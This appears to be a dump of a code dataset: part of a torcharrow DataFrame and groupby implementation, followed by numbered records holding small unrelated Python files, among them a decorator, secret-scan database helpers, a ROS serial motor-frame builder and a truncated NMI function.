                if not self._has_all_null(i):
                    res._append(i)
        # NOTE(review): an unrecognized `how` silently yields an empty result —
        # confirm whether it should raise instead.
        return res._finalize()
@trace
@expression
def drop_duplicates(
self,
subset: Optional[List[str]] = None,
keep: Literal["first", "last", False] = "first",
):
"""Remove duplicate values from data but keep the first, last, none (keep=False)"""
columns = subset if subset is not None else self.columns
self._check_columns(columns)
# TODO fix slow implementation by vectorization,
# i.e do unique per column and delete when all agree
# shortcut once no match is found.
res = Scope._EmptyColumn(self.dtype)
indices = [self.columns.index(s) for s in columns]
seen = set()
for tup in self:
row = tuple(tup[i] for i in indices)
if row in seen:
continue
else:
seen.add(row)
res._append(tup)
return res._finalize()
# @staticmethod
def _has_any_null(self, tup) -> bool:
for t in tup:
if t is None:
return True
if isinstance(t, tuple) and self._has_any_null(t):
return True
return False
# @staticmethod
def _has_all_null(self, tup) -> bool:
for t in tup:
if t is not None:
return False
if isinstance(t, tuple) and not self._has_all_null(t):
return False
return True
# universal ---------------------------------------------------------
# TODO Decide on tracing level: If we trace 'min' om a
# - highlevel then we can use lambdas inside min
# - lowelevel, i.e call 'summarize', then lambdas have to become
# - global functions if they have no state
# - dataclasses with an apply function if they have state
    @staticmethod
    def _cmin(c):
        # Selector used by min(): returns the bound `min` method of column `c`
        # (called later by _summarize).
        return c.min
# with static function
@trace
@expression
def min(self):
"""Return the minimum of the non-null values of the Column."""
return self._summarize(DataFrameCpu._cmin)
# with dataclass function
# @expression
# def min(self, numeric_only=None):
# """Return the minimum of the non-null values of the Column."""
# return self._summarize(_Min(), {"numeric_only": numeric_only})
# with lambda
# @expression
# def min(self, numeric_only=None):
# """Return the minimum of the non-null values of the Column."""
# return self._summarize(lambda c: c.min, {"numeric_only": numeric_only})
@trace
@expression
def max(self):
"""Return the maximum of the non-null values of the column."""
# skipna == True
return self._summarize(lambda c: c.max)
@trace
@expression
def all(self):
"""Return whether all non-null elements are True in Column"""
return self._summarize(lambda c: c.all)
@trace
@expression
def any(self):
"""Return whether any non-null element is True in Column"""
return self._summarize(lambda c: c.any)
@trace
@expression
def sum(self):
"""Return sum of all non-null elements in Column"""
return self._summarize(lambda c: c.sum)
@trace
@expression
def prod(self):
"""Return produce of the values in the data"""
return self._summarize(lambda c: c.prod)
@trace
@expression
def cummin(self):
"""Return cumulative minimum of the data."""
return self._lift(lambda c: c.cummin)
@trace
@expression
def cummax(self):
"""Return cumulative maximum of the data."""
return self._lift(lambda c: c.cummax)
@trace
@expression
def cumsum(self):
"""Return cumulative sum of the data."""
return self._lift(lambda c: c.cumsum)
@trace
@expression
def cumprod(self):
"""Return cumulative product of the data."""
return self._lift(lambda c: c.cumprod)
@trace
@expression
def mean(self):
"""Return the mean of the values in the series."""
return self._summarize(lambda c: c.mean)
@trace
@expression
def median(self):
"""Return the median of the values in the data."""
return self._summarize(lambda c: c.median)
@trace
@expression
def mode(self):
"""Return the mode(s) of the data."""
return self._summarize(lambda c: c.mode)
@trace
@expression
def std(self):
"""Return the stddev(s) of the data."""
return self._summarize(lambda c: c.std)
    @trace
    @expression
    def _nunique(self, drop_null=True):
        """Returns the number of unique values per column"""
        # Result is a two-column frame: column name -> unique count.
        res = {}
        res["column"] = ta.Column([f.name for f in self.dtype.fields], dt.string)
        res["unique"] = ta.Column(
            [
                # Delegate to each child column's _nunique.
                ColumnFromVelox.from_velox(
                    self.device,
                    f.dtype,
                    self._data.child_at(self._data.type().get_child_idx(f.name)),
                    True,
                )._nunique(drop_null)
                for f in self.dtype.fields
            ],
            dt.int64,
        )
        # No null mask: the summary frame has no null rows.
        return self._fromdata(res, None)
    def _summarize(self, func):
        # Apply `func` (a column -> bound aggregate method selector) to every
        # child column and collect the scalar results into a one-row frame of
        # the same struct dtype.
        res = ta.Column(self.dtype)
        for i in range(self._data.children_size()):
            result = func(
                ColumnFromVelox.from_velox(
                    self.device,
                    self.dtype.fields[i].dtype,
                    self._data.child_at(i),
                    True,
                )
            )()
            if result is None:
                # A null aggregate (e.g. on an empty column) becomes a null cell.
                res._data.child_at(i).append_null()
            else:
                res._data.child_at(i).append(result)
        # One summary row regardless of input length.
        res._data.set_length(1)
        return res
    @trace
    def _lift(self, func):
        # Apply `func` (a column -> bound method selector, e.g. cumsum) to every
        # child column and assemble the per-column results into a new frame of
        # the same struct dtype and length. Only defined for frames without
        # null rows.
        if self.null_count == 0:
            res = velox.Column(get_velox_type(self.dtype))
            for i in range(self._data.children_size()):
                child = func(
                    ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                )()
                res.set_child(
                    i,
                    child._data,
                )
            res.set_length(len(self._data))
            return ColumnFromVelox.from_velox(self.device, self.dtype, res, True)
        raise NotImplementedError("Dataframe row is not allowed to have nulls")
# describe ----------------------------------------------------------------
@trace
@expression
def describe(
self,
percentiles=None,
include_columns=None,
exclude_columns=None,
):
"""Generate descriptive statistics."""
# Not supported: datetime_is_numeric=False,
includes = []
if include_columns is None:
includes = [f.name for f in self.dtype.fields if dt.is_numerical(f.dtype)]
elif isinstance(include_columns, list):
includes = [f.name for f in self.dtype.fields if f.dtype in include_columns]
else:
raise TypeError(
f"describe with include_columns of type {type(include_columns).__name__} is not supported"
)
excludes = []
if exclude_columns is None:
excludes = []
elif isinstance(exclude_columns, list):
excludes = [f.name for f in self.dtype.fields if f.dtype in exclude_columns]
else:
raise TypeError(
f"describe with exclude_columns of type {type(exclude_columns).__name__} is not supported"
)
selected = [i for i in includes if i not in excludes]
if percentiles is None:
percentiles = [25, 50, 75]
percentiles = sorted(set(percentiles))
if len(percentiles) > 0:
if percentiles[0] < 0 or percentiles[-1] > 100:
raise ValueError("percentiles must be betwen 0 and 100")
res = {}
res["metric"] = ta.Column(
["count", "mean", "std", "min"] + [f"{p}%" for p in percentiles] + ["max"]
)
for s in selected:
idx = self._data.type().get_child_idx(s)
c = ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[idx].dtype,
self._data.child_at(idx),
True,
)
res[s] = ta.Column(
[c._count(), c.mean(), c.std(), c.min()]
+ c.quantile(percentiles, "midpoint")
+ [c.max()]
)
return self._fromdata(res, [False] * len(res["metric"]))
# Dataframe specific ops -------------------------------------------------- #
    @trace
    @expression
    def drop(self, columns: List[str]):
        """
        Returns DataFrame without the removed columns.
        """
        self._check_columns(columns)
        # Rebuild from all children whose field name is NOT in `columns`;
        # self's null mask is kept.
        return self._fromdata(
            {
                self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                    self.device,
                    self.dtype.fields[i].dtype,
                    self._data.child_at(i),
                    True,
                )
                for i in range(self._data.children_size())
                if self.dtype.fields[i].name not in columns
            },
            self._mask,
        )
    @trace
    @expression
    def keep(self, columns: List[str]):
        """
        Returns DataFrame with the kept columns only.
        """
        self._check_columns(columns)
        # Inverse of drop(): retain only children whose field name is in
        # `columns`; self's null mask is kept.
        return self._fromdata(
            {
                self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                    self.device,
                    self.dtype.fields[i].dtype,
                    self._data.child_at(i),
                    True,
                )
                for i in range(self._data.children_size())
                if self.dtype.fields[i].name in columns
            },
            self._mask,
        )
    @trace
    @expression
    def rename(self, column_mapper: Dict[str, str]):
        """Return a DataFrame with columns renamed per `column_mapper`.

        Names not present in the mapper are kept unchanged.
        """
        self._check_columns(column_mapper.keys())
        return self._fromdata(
            {
                # Map old name -> new name, defaulting to the old name.
                column_mapper.get(
                    self.dtype.fields[i].name, self.dtype.fields[i].name
                ): ColumnFromVelox.from_velox(
                    self.device,
                    self.dtype.fields[i].dtype,
                    self._data.child_at(i),
                    True,
                )
                for i in range(self._data.children_size())
            },
            self._mask,
        )
@trace
@expression
def reorder(self, columns: List[str]):
"""
Returns DataFrame with the columns in the prescribed order.
"""
self._check_columns(columns)
return self._fromdata(
{
col: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[self._data.type().get_child_idx(col)].dtype,
self._data.child_at(self._data.type().get_child_idx(col)),
True,
)
for col in columns
},
self._mask,
)
# interop ----------------------------------------------------------------
def to_pandas(self):
"""Convert self to pandas dataframe"""
# TODO Add type translation.
# Skipping analyzing 'pandas': found module but no type hints or library stubs
import pandas as pd # type: ignore
map = {}
for n, c in self._field_data.items():
map[n] = c.to_pandas()
return pd.DataFrame(map)
def to_arrow(self):
"""Convert self to arrow table"""
# TODO Add type translation
import pyarrow as pa # type: ignore
map = {}
for n, c in self._field_data.items():
map[n] = c.to_arrow()
return pa.table(map)
    def to_torch(self):
        """Convert self to a named tuple of per-column torch representations."""
        pytorch.ensure_available()
        import torch
        # TODO: this actually puts the type annotations on the tuple wrong.
        # We might need to address it eventually, but because it's Python it doesn't matter
        tup_type = self._dtype.py_type
        # One to_torch() call per field, in field order.
        return tup_type(*(self[f.name].to_torch() for f in self.dtype.fields))
# fluent with symbolic expressions ----------------------------------------
# TODO decide on whether we nat to have arbitrarily nested wheres...
@trace
@expression
def where(self, *conditions):
"""
Analogous to SQL's where (NOT Pandas where)
Filter a dataframe to only include rows satisfying a given set
of conditions. df.where(p) is equivalent to writing df[p].
Examples
--------
>>> from torcharrow import ta
>>> xf = ta.DataFrame({
>>> 'A':['a', 'b', 'a', 'b'],
>>> 'B': [1, 2, 3, 4],
>>> 'C': [10,11,12,13]})
>>> xf.where(xf['B']>2)
index A B C
------- --- --- ---
0 a 3 12
1 b 4 13
dtype: Struct([Field('A', string), Field('B', int64), Field('C', int64)]), count: 2, null_count: 0
When referring to self in an expression, the special value `me` can be
used.
>>> from torcharrow import me
>>> xf.where(me['B']>2)
index A B C
------- --- --- ---
0 a 3 12
1 b 4 13
dtype: Struct([Field('A', string), Field('B', int64), Field('C', int64)]), count: 2, null_count: 0
"""
if len(conditions) == 0:
return self
values = []
for i, condition in enumerate(conditions):
value = eval_expression(condition, {"me": self})
values.append(value)
reduced_values = functools.reduce(lambda x, y: x & y, values)
return self[reduced_values]
    @trace
    @expression
    def select(self, *args, **kwargs):
        """
        Analogous to SQL's ``SELECT`.
        Transform a dataframe by selecting old columns and new (computed)
        columns.
        args - positional string arguments
        Column names to keep in the projection. A column name of "*" is a
        shortcut to denote all columns. A column name beginning with "-"
        means remove this column.
        kwargs - named value arguments
        New column name expressions to add to the projection
        The special symbol me can be used to refer to self.
        Examples
        --------
        >>> from torcharrow import ta
        >>> xf = ta.DataFrame({
        >>> 'A': ['a', 'b', 'a', 'b'],
        >>> 'B': [1, 2, 3, 4],
        >>> 'C': [10,11,12,13]})
        >>> xf.select(*xf.columns,D=me['B']+me['C'])
        index A B C D
        ------- --- --- --- ---
        0 a 1 10 11
        1 b 2 11 13
        2 a 3 12 15
        3 b 4 13 17
        dtype: Struct([Field('A', string), Field('B', int64), Field('C', int64), Field('D', int64)]), count: 4, null_count: 0
        Using '*' and '-colname':
        >>> xf.select('*','-B',D=me['B']+me['C'])
        index A C D
        ------- --- --- ---
        0 a 10 11
        1 b 11 13
        2 a 12 15
        3 b 13 17
        dtype: Struct([Field('A', string), Field('C', int64), Field('D', int64)]), count: 4, null_count: 0
        """
        input_columns = set(self.columns)
        has_star = False
        include_columns = []
        exclude_columns = []
        # Classify every positional arg as star, include, or exclude, and
        # reject duplicates / unknown names as we go.
        for arg in args:
            if not isinstance(arg, str):
                raise TypeError("args must be column names")
            if arg == "*":
                if has_star:
                    raise ValueError("select received repeated stars")
                has_star = True
            elif arg in input_columns:
                if arg in include_columns:
                    raise ValueError(
                        f"select received a repeated column-include ({arg})"
                    )
                include_columns.append(arg)
            elif arg[0] == "-" and arg[1:] in input_columns:
                if arg in exclude_columns:
                    raise ValueError(
                        f"select received a repeated column-exclude ({arg[1:]})"
                    )
                exclude_columns.append(arg[1:])
            else:
                raise ValueError(f"argument ({arg}) does not denote an existing column")
        # Cross-validate the combinations: excludes require a star, and a
        # star may not be mixed with explicit includes.
        if exclude_columns and not has_star:
            raise ValueError("select received column-exclude without a star")
        if has_star and include_columns:
            raise ValueError("select received both a star and column-includes")
        if set(include_columns) & set(exclude_columns):
            raise ValueError(
                "select received overlapping column-includes and " + "column-excludes"
            )
        include_columns_inc_star = self.columns if has_star else include_columns
        output_columns = [
            col for col in include_columns_inc_star if col not in exclude_columns
        ]
        res = {}
        # Project the surviving input columns in their original child order.
        for i in range(self._data.children_size()):
            n = self.dtype.fields[i].name
            if n in output_columns:
                res[n] = ColumnFromVelox.from_velox(
                    self.device,
                    self.dtype.fields[i].dtype,
                    self._data.child_at(i),
                    True,
                )
        # Computed columns: evaluate each kwarg expression with `me` = self.
        for n, c in kwargs.items():
            res[n] = eval_expression(c, {"me": self})
        return self._fromdata(res, self._mask)
    @trace
    @expression
    def pipe(self, func, *args, **kwargs):
        """
        Apply func(self, *args, **kwargs).

        Enables fluent chaining of user-defined transformations:
        ``df.pipe(f, x).pipe(g)`` instead of ``g(f(df, x))``.
        """
        return func(self, *args, **kwargs)
    @trace
    @expression
    def groupby(
        self,
        by: List[str],
        sort=False,
        drop_null=True,
    ):
        """
        SQL like data grouping, supporting split-apply-combine paradigm.
        Parameters
        ----------
        by - list of strings
        List of column names to group by.
        sort - bool
        Whether the groups are in sorted order.
        drop_null - bool
        Whether NULL/NaNs in group keys are dropped.
        Examples
        --------
        >>> import torcharrow as ta
        >>> df = ta.DataFrame({'A': ['a', 'b', 'a', 'b'], 'B': [1, 2, 3, 4]})
        >>> # group by A
        >>> grouped = df.groupby(['A'])
        >>> # apply sum on each of B's grouped column to create a new column
        >>> grouped_sum = grouped['B'].sum()
        >>> # combine a new dataframe from old and new columns
        >>> res = ta.DataFrame()
        >>> res['A'] = grouped['A']
        >>> res['B.sum'] = grouped_sum
        >>> res
        index A B.sum
        ------- --- -------
        0 a 4
        1 b 6
        dtype: Struct([Field('A', string), Field('B.sum', int64)]), count: 2, null_count: 0
        The same as above, as a one-liner:
        >>> df.groupby(['A']).sum()
        index A B.sum
        ------- --- -------
        0 a 4
        1 b 6
        dtype: Struct([Field('A', string), Field('B.sum', int64)]), count: 2, null_count: 0
        To apply multiple aggregate functions to different parts of the
        dataframe, use groupby followed by select.
        >>> df = ta.DataFrame({
        >>> 'A':['a', 'b', 'a', 'b'],
        >>> 'B': [1, 2, 3, 4],
        >>> 'C': [10,11,12,13]})
        >>> df.groupby(['A']).select(b_sum=me['B'].sum(), c_count=me['C'].count())
        index A b_sum c_count
        ------- --- ------- ---------
        0 a 4 2
        1 b 6 2
        dtype: Struct([Field('A', string), Field('b_sum', int64), Field('c_count', int64)]), count: 2, null_count: 0
        To see what data groups contain:
        >>> for g, df in grouped:
        print(g)
        print(" ", df)
        ('a',)
        self._fromdata({'B':Column([1, 3], id = c129), id = c130})
        ('b',)
        self._fromdata({'B':Column([2, 4], id = c131), id = c132})
        """
        # TODO implement
        # Only the default flags are supported so far.
        assert not sort
        assert drop_null
        self._check_columns(by)
        key_columns = by
        key_fields = []
        item_fields = []
        # Partition the schema into grouping keys and grouped items.
        for k in key_columns:
            key_fields.append(dt.Field(k, self.dtype.get(k)))
        for f in self.dtype.fields:
            if f.name not in key_columns:
                item_fields.append(f)
        # Map each distinct key tuple to the (unsigned int) row indices
        # belonging to that group.
        groups: Dict[Tuple, ar.array] = {}
        for i in range(len(self)):
            if self.is_valid_at(i):
                key = tuple(
                    self._data.child_at(self._data.type().get_child_idx(f.name))[i]
                    for f in key_fields
                )
                if key not in groups:
                    groups[key] = ar.array("I")
                df = groups[key]
                df.append(i)
            else:
                # Null rows are dropped (drop_null is asserted True above).
                pass
        return GroupedDataFrame(key_fields, item_fields, groups, self)
@dataclass
class GroupedDataFrame:
    """Result of ``DataFrameCpu.groupby``: key/item schema plus, per distinct
    key tuple, the row indices of the parent dataframe in that group.

    Fixes: ``max()`` previously lifted ``"min"`` (returned minima);
    ``__getitem__``'s error message used ``type(arg).__name`` (raising
    AttributeError instead of the intended TypeError); ``count()``'s
    docstring was a stddev copy/paste.
    """

    _key_fields: List[dt.Field]
    _item_fields: List[dt.Field]
    _groups: Mapping[Tuple, Sequence]
    _parent: DataFrameCpu

    @property
    def _scope(self):
        return self._parent._scope

    @property  # type: ignore
    @traceproperty
    def size(self):
        """
        Return the size of each group (including nulls).
        """
        # One row per group: the key columns followed by the group length.
        res = {
            f.name: ta.Column([v[idx] for v, _ in self._groups.items()], f.dtype)
            for idx, f in enumerate(self._key_fields)
        }
        res["size"] = ta.Column([len(c) for _, c in self._groups.items()], dt.int64)
        return self._parent._fromdata(res, None)

    def __iter__(self):
        """
        Yield pairs of grouped tuple and the grouped dataframe
        """
        for g, xs in self._groups.items():
            dtype = dt.Struct(self._item_fields)
            # Materialize the group's rows (item fields only) from the parent.
            df = ta.Column(dtype).append(
                tuple(
                    tuple(
                        self._parent._data.child_at(
                            self._parent._data.type().get_child_idx(f.name)
                        )[x]
                        for f in self._item_fields
                    )
                    for x in xs
                )
            )
            yield g, df

    @trace
    def _lift(self, op: str) -> IColumn:
        # Dispatch an aggregation: with key fields present this is a
        # dataframe-level combine; with exactly one item field it is a
        # single-column aggregation.
        if len(self._key_fields) > 0:
            # it is a dataframe operation:
            return self._combine(op)
        elif len(self._item_fields) == 1:
            return self._apply1(self._item_fields[0], op)
        raise AssertionError("unexpected case")

    def _combine(self, op: str):
        # Build key columns plus one "<name>.<op>" aggregate column per item.
        agg_fields = [dt.Field(f"{f.name}.{op}", f.dtype) for f in self._item_fields]
        res = {}
        for f, c in zip(self._key_fields, self._unzip_group_keys()):
            res[f.name] = c
        for f, c in zip(agg_fields, self._apply(op)):
            res[f.name] = c
        return self._parent._fromdata(res, None)

    def _apply(self, op: str) -> List[IColumn]:
        # Aggregate every item field with `op`, one result column per field.
        cols = []
        for f in self._item_fields:
            cols.append(self._apply1(f, op))
        return cols

    def _apply1(self, f: dt.Field, op: str) -> IColumn:
        # Aggregate one field: gather each group's values, run the op's
        # aggregator, and collect one result per group.
        src_t = f.dtype
        dest_f, dest_t = dt.get_agg_op(op, src_t)
        res = Scope._EmptyColumn(dest_t)
        src_c = self._parent._data.child_at(
            self._parent._data.type().get_child_idx(f.name)
        )
        for g, xs in self._groups.items():
            dest_data = [src_c[x] for x in xs]
            dest_c = dest_f(ta.Column(dest_data, dtype=dest_t))
            res._append(dest_c)
        return res._finalize()

    def _unzip_group_keys(self) -> List[IColumn]:
        # Transpose the key tuples into one column per key field.
        cols = []
        for f in self._key_fields:
            cols.append(Scope._EmptyColumn(f.dtype))
        for tup in self._groups.keys():
            for i, t in enumerate(tup):
                cols[i]._append(t)
        return [col._finalize() for col in cols]

    def __contains__(self, key: str):
        for f in self._item_fields:
            if f.name == key:
                return True
        for f in self._key_fields:
            if f.name == key:
                return True
        return False

    def __getitem__(self, arg):
        """
        Return the named grouped column
        """
        # TODO extend that this works inside struct frames as well,
        # e.g. grouped['a']['b'] where grouped returns a struct column having 'b' as field
        if isinstance(arg, str):
            # An item field yields a single-field grouped view; a key field
            # yields its distinct values as a plain column.
            for f in self._item_fields:
                if f.name == arg:
                    return GroupedDataFrame([], [f], self._groups, self._parent)
            for i, f in enumerate(self._key_fields):
                if f.name == arg:
                    res = Scope._EmptyColumn(f.dtype)
                    for tup in self._groups.keys():
                        res._append(tup[i])
                    return res._finalize()
            raise ValueError(f"no column named ({arg}) in grouped dataframe")
        # Bug fix: was `type(arg).__name` (no such attribute).
        raise TypeError(f"unexpected type for arg ({type(arg).__name__})")

    def min(self, numeric_only=None):
        """Return the minimum of the non-null values of the Column."""
        assert numeric_only is None
        return self._lift("min")

    def max(self, numeric_only=None):
        """Return the maximum of the non-null values of the Column."""
        assert numeric_only is None
        # Bug fix: previously lifted "min", so max() returned group minima.
        return self._lift("max")

    def all(self, boolean_only=None):
        """Return whether all non-null elements are True in Column"""
        # skipna == True
        return self._lift("all")

    def any(self, skipna=True, boolean_only=None):
        """Return whether any non-null element is True in Column"""
        # skipna == True
        return self._lift("any")

    def sum(self):
        """Return sum of all non-null elements in Column"""
        # skipna == True
        # only_numerical == True
        # skipna == True
        return self._lift("sum")

    def prod(self):
        """Return produce of the values in the data"""
        # skipna == True
        # only_numerical == True
        return self._lift("prod")

    def mean(self):
        """Return the mean of the values in the series."""
        return self._lift("mean")

    def median(self):
        """Return the median of the values in the data."""
        return self._lift("median")

    def mode(self):
        """Return the mode(s) of the data."""
        return self._lift("mode")

    def std(self):
        """Return the stddev(s) of the data."""
        return self._lift("std")

    def count(self):
        """Return the count of non-null values of the data."""
        return self._lift("count")

    # TODO should add reduce here as well...

    @trace
    def agg(self, arg):
        """
        Apply aggregation(s) to the groups.
        """
        # DataFrame{'a': [1, 1, 2], 'b': [1, 2, 3], 'c': [2, 2, 1]})
        # a.groupby('a').agg('sum') -- applied on rest
        # a.groupby('a').agg(['sum', 'min']) -- both applied on rest
        # a.groupby('a').agg({'b': ['min', 'mean']}) -- applied on
        # TODO
        # a.groupby('a').aggregate( a= me['a'].mean(), b_min =me['b'].min(), b_mean=me['c'].mean()))
        # f1 = lambda x: x.quantile(0.5); f1.__name__ = "q0.5"
        # f2 = lambda x: x.quantile(0.75); f2.__name__ = "q0.75"
        # a.groupby('a').agg([f1, f2])
        res = {}
        for f, c in zip(self._key_fields, self._unzip_group_keys()):
            res[f.name] = c
        for agg_name, field, op in self._normalize_agg_arg(arg):
            res[agg_name] = self._apply1(field, op)
        return self._parent._fromdata(res, None)

    def aggregate(self, arg):
        """
        Apply aggregation(s) to the groups.
        """
        return self.agg(arg)

    @trace
    def select(self, **kwargs):
        """
        Like select for dataframes, except for groups
        """
        res = {}
        for f, c in zip(self._key_fields, self._unzip_group_keys()):
            res[f.name] = c
        for n, c in kwargs.items():
            res[n] = eval_expression(c, {"me": self})
        return self._parent._fromdata(res)

    def _normalize_agg_arg(self, arg):
        # Normalize agg's flexible argument into (result_name, field, op)
        # triples. Accepts a single op name, a list of op names, or a dict
        # of column -> op(s).
        res = []  # triple name, field, op
        if isinstance(arg, str):
            # normalize
            arg = [arg]
        if isinstance(arg, list):
            for op in arg:
                for f in self._item_fields:
                    res.append((f"{f.name}.{op}", f, op))
        elif isinstance(arg, dict):
            for n, ops in arg.items():
                fields = [f for f in self._item_fields if f.name == n]
                if len(fields) == 0:
                    raise ValueError(f"column ({n}) does not exist")
                # TODO handle duplicate columns, if ever...
                assert len(fields) == 1
                if isinstance(ops, str):
                    ops = [ops]
                for op in ops:
                    res.append((f"{n}.{op}", fields[0], op))
        else:
            raise TypeError(f"unexpected arg type ({type(arg).__name__})")
        return res
# ------------------------------------------------------------------------------
# registering the factory
# Map (typecode, device) keys to DataFrameCpu constructors so the generic
# Dispatcher can build cpu-backed struct columns.
Dispatcher.register((dt.Struct.typecode + "_empty", "cpu"), DataFrameCpu._empty)
Dispatcher.register((dt.Struct.typecode + "_full", "cpu"), DataFrameCpu._full)
Dispatcher.register((dt.Struct.typecode + "_fromlist", "cpu"), DataFrameCpu._fromlist)
# ------------------------------------------------------------------------------
# DataFrame var (is here and not in Expression) to break cyclic import dependency
# ------------------------------------------------------------------------------
# Relational operators, still TBD
# def join(
# self,
# other,
# on=None,
# how="left",
# lsuffix="",
# rsuffix="",
# sort=False,
# method="hash",
# ):
# """Join columns with other DataFrame on index or on a key column."""
# def rolling(
# self, window, min_periods=None, center=False, axis=0, win_type=None
# ):
# return Rolling(
# self,
# window,
# min_periods=min_periods,
# center=center,
# axis=axis,
# win_type=win_type,
# )
#
# all set operations: union, uniondistinct, except, etc.
|
986,924 | ff121508fee09e093a5044dc55c2a65892945acf | from typing import Any, Optional, Union
from executor.meta.env_var import must_extract_env_var
from executor.meta.meta import set_meta_information, has_meta_information, get_meta_information
__order_key = "order"
def has_order(obj: Any) -> bool:
"""Return True if an order index was attached to *obj* via the @order decorator."""
return has_meta_information(obj, __order_key)
def get_order(obj: Any) -> Optional[int]:
"""Return the order index attached to *obj*, or None if none was set."""
return get_meta_information(obj, __order_key)
def order(value: Union[int, str]):
    """Decorator that attaches an execution-order index to a function.

    *value* is either the index itself, or the name of an environment
    variable whose (required) value is parsed as the index.
    """
    def __decorator(func):
        resolved = value if isinstance(value, int) else int(must_extract_env_var(value))
        set_meta_information(func, __order_key, resolved)
        return func
    return __decorator
|
def index_of_caps(word):
    """Return the indices of all uppercase characters in *word*."""
    # comprehension instead of a manual append loop
    return [pos for pos, ch in enumerate(word) if ch.isupper()]

# FIX: the demo line carried trailing table junk (" |") that broke the syntax
print(index_of_caps("aLoR"))
986,926 | 49a7a3fe71dd8c8470da2b0f5792ec728ef22254 | from datetime import datetime, timezone
from typing import List
from sqlalchemy.sql import and_, or_, select
from raddar.db.database import analysis, database, project, secret
from raddar.lib.managers.repository_manager import get_branch_name
from raddar.models import models
from raddar.schemas import schemas
async def create_analysis_secret(
secret_to_create: schemas.SecretBase, analysis_id: int
):
# Insert one secret row linked to the given analysis; returns the new row id.
query = secret.insert(None).values(
**secret_to_create.dict(), analysis_id=analysis_id
)
return await database.execute(query=query)
async def create_project(project_to_create: schemas.ProjectBase):
# Insert a project row from the schema fields; returns the new row id.
query = project.insert(None).values(**project_to_create.dict())
return await database.execute(query=query)
async def create_analysis(
    project_id: int,
    analysis_to_create: schemas.AnalysisBase,
    ref_name: str,
    scan_origin: models.ScanOrigin,
    secrets_to_create: List[schemas.SecretBase],
):
    """Insert an analysis row plus one secret row per detected secret.

    Returns a dict describing the stored analysis: the schema fields, the
    generated analysis id, the (UTC) execution timestamp, and the stored
    secrets including their generated ids.
    """
    now = datetime.now(timezone.utc)
    query = analysis.insert(None).values(
        execution_date=now,
        branch_name=get_branch_name(analysis_to_create.branch_name),
        ref_name=ref_name,
        scan_origin=scan_origin,
        project_id=project_id,
    )
    analysis_returned_id = await database.execute(query=query)
    secrets_returned = []
    for secret_to_create in secrets_to_create:
        secret_returned_id = await create_analysis_secret(
            secret_to_create, analysis_returned_id
        )
        secrets_returned.append({**secret_to_create.dict(), "id": secret_returned_id})
    return {
        **analysis_to_create.dict(),
        "id": analysis_returned_id,
        "execution_date": now,
        "ref_name": ref_name,
        "scan_origin": scan_origin,
        "project_id": project_id,
        # BUG FIX: previously returned `secrets_to_create` and silently
        # discarded `secrets_returned`, dropping the generated secret ids.
        "secrets": secrets_returned,
    }
async def get_project_analysis_secrets_by_name_and_ref(
project_name: str, branch_name: str, ref_name: str
):
# Fetch all secrets of the most recent analysis matching the project name
# and either the branch name or the ref name.
# NOTE(review): the subquery filters on project.c.name without an explicit
# join between analysis and project — confirm the implicit join/FK is
# intended and correct.
query = select([secret]).where(
secret.c.analysis_id
== (
select([analysis.c.id])
.where(
and_(
project.c.name == project_name,
or_(
analysis.c.branch_name == branch_name,
analysis.c.ref_name == ref_name,
),
)
)
.order_by(analysis.c.execution_date.desc())
.limit(1)
)
)
return await database.fetch_all(query)
async def get_project_analysis_by_name_and_ref(
project_name: str, branch_name: str, ref_name: str
):
# Fetch the id of the most recent analysis matching the project name and
# either the branch name or the ref name (same filter as the secrets query).
# NOTE(review): as above, project is referenced without an explicit join.
query = (
select([analysis.c.id])
.where(
and_(
project.c.name == project_name,
or_(
analysis.c.branch_name == branch_name,
analysis.c.ref_name == ref_name,
),
)
)
.order_by(analysis.c.execution_date.desc())
.limit(1)
)
return await database.fetch_one(query)
async def get_project_by_name(project_name: str):
# Fetch a single project row by its (unique) name, or None if absent.
query = project.select().where(project.c.name == project_name)
return await database.fetch_one(query=query)
async def get_projects():
# Fetch all project rows.
query = project.select()
return await database.fetch_all(query)
|
986,927 | 2cf0e7c72308c87c7ccb8e69b052f4a083e95963 | from funkyrolodex import FunkyRolodex
import time
start_time = time.time()
parser = FunkyRolodex()
if __name__ == '__main__':
# parse the sample input, dump the result as JSON, then report the runtime
parser.process_entries('sample-shafayet.in')
parser.jsonify('result.out')
# NOTE: Python 2 print statement
print time.time() - start_time, 'seconds'
|
986,928 | aa07a91b6af6aae37940af78409b4050fd903113 | #!/usr/bin/env python
# -*- coding: utf-8 -*
import sys
import rospy
import serial
# Python 2 idiom: reload(sys) is needed before setdefaultencoding is visible
reload(sys)
sys.setdefaultencoding('utf-8')
# NOTE(review): 'COM0' is a Windows-style port name, but the shebang and the
# rospy import suggest Linux (e.g. '/dev/ttyUSB0') — confirm the device path.
ser = serial.Serial('COM0', 38400)
print ser.isOpen()
def send(m_sspeed_x, m_sspeed_y, m_sspeed_w):
    """Build the 12-byte drive-command frame for the motor controller.

    Speeds are encoded as 16-bit two's-complement big-endian pairs; the frame
    is STX, x, y, w, state, e-stop, source, XOR checksum, ETX.
    """
    def encode_u16(value):
        # two's-complement fold negatives into 0..65535, then split hi/lo
        if value < 0:
            value = 65536 + value
        return divmod(value, 256)

    frame = [0] * 12
    frame[0] = 0x02                    # STX
    frame[1:3] = encode_u16(m_sspeed_x)
    frame[3:5] = encode_u16(m_sspeed_y)
    frame[5:7] = encode_u16(m_sspeed_w)
    frame[7] = 0x11                    # state: 0 = standby, 1 = driving
    frame[8] = 0x00                    # e-stop flag: 0 = normal, 1 = emergency stop
    frame[9] = 0x55                    # 0x55 = host-PC control, 0xAA = remote control
    checksum = 0x00
    for byte in frame[:10]:
        checksum ^= byte
    frame[10] = checksum
    frame[11] = 0x03                   # ETX
    return frame
if __name__ == '__main__':
# teleop help text; the actual key-reading loop is not implemented in this file
print "Reading from keyboard"
print "Use WASD keys to control the robot"
print "Press j to stop"
print "Press q to quit"
|
986,929 | b1529c895264103278c63baab45e52b2c230fb30 | # coding=utf-8
import pandas as pd
from pandas import DataFrame
import matplotlib.pyplot as plt
import numpy as np
import math
def NMI(A, B):
    """Normalized mutual information between two labelings A and B.

    Returns 2*I(A;B) / (H(A) + H(B)); 1.0 for identical partitions, 0.0 for
    independent ones. Entropies are in bits.
    """
    first = DataFrame({"A": A, "B": B})
    total = len(A)
